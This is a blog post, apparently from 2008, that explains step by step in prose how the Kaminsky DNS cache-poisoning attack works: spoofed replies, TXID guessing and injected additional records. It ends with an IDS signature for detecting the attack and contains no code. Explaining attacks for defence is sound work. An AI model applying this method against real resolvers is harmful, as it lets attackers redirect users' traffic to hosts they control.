Deprecated: Assigning the return value of new by reference is deprecated in /home/asamhuri/public_html/blog/inc/widgets/model/_widget.class.php on line 451
Deprecated: Assigning the return value of new by reference is deprecated in /home/asamhuri/public_html/blog/inc/widgets/model/_widget.class.php on line 547
| « Securebits Releases the DNS Multiple-Race Exploiting Tool | DNS in Danger again [1] » |
DNS in Danger again [2]
07/28/08
04:07:29 am, Categories: dns …Continuation of the previous entry…
Dan's Discovery
Although the attack discovered by Dan Kaminsky is still about DNS cache poisoning, the attack has a unique feature that exploits an inherent DNS implementation. The attack can successfully poison the cache even though the cache might already contain the entry (hostname and IP) the attacker wants to set. For example, if the cache contains an entry like www.securebitsorg -> 65.65.65.65, the attack can successfully overwrite it.
The attack happens as follows: the attacker sends many a DNS Query packets to the DNS server to be poisoned, and after sending each query packet, he also sends a reply packet. The query packets ask for non-existent names under specific domain (for example: 00001.securebits.org, 00002.securebits.org, 00003.securebits.org, etc). Since the DNS server under attack is not the authoritative server for the domain securebits.org, it will poll the address through recursive queries. Typically, the Name Server which will give the final answer is the authoritative Name Server of securebits.org, that is, ns.securebits.org.
The fake replies sent by the attacker along the queries have the source IP address as ns.securebits.org. Also, they all have the same TXID. Another thing to note is that the destination port address must match the source port address of the packets sent by the DNS server. The attacker can easily guess this at the beginning by issuing a query to a name under a domain he controls. The source port number will be used as destination port number in all the replies. Since the TXID is 16 bits, in average, it takes around 30,000 replies to hit the correct the TXID; and the cache is poisoned …
Until here, the cache is poisoned with a record for a non-existent name like 12345.securebits.org. Since the attacker is more interested in setting a record for www.securebits.org, the reply can be a more sophisticated; it can contain additional Resource Record (RR) that says www.securebits.org is at 33.33.33.33
A few notes to bear in mind:
- The attack works regardless of the cache contains a record for the name that attacker wants to inject.
- Almost all DNS servers can be attacked/poisoned. Even with the patches released by vendors, the attack process can take couple of hours instead of couple of seconds.
- To block this attack using an IDS/IPS, a signature would be multiple DNS reply packets with the same source IP address and the same TXID.
Deprecated: Assigning the return value of new by reference is deprecated in /home/asamhuri/public_html/blog/skins/_item_feedback.inc.php on line 156
Deprecated: Assigning the return value of new by reference is deprecated in /home/asamhuri/public_html/blog/plugins/_calendar.plugin.php on line 190
Deprecated: Assigning the return value of new by reference is deprecated in /home/asamhuri/public_html/blog/plugins/_calendar.plugin.php on line 905
XML Feeds
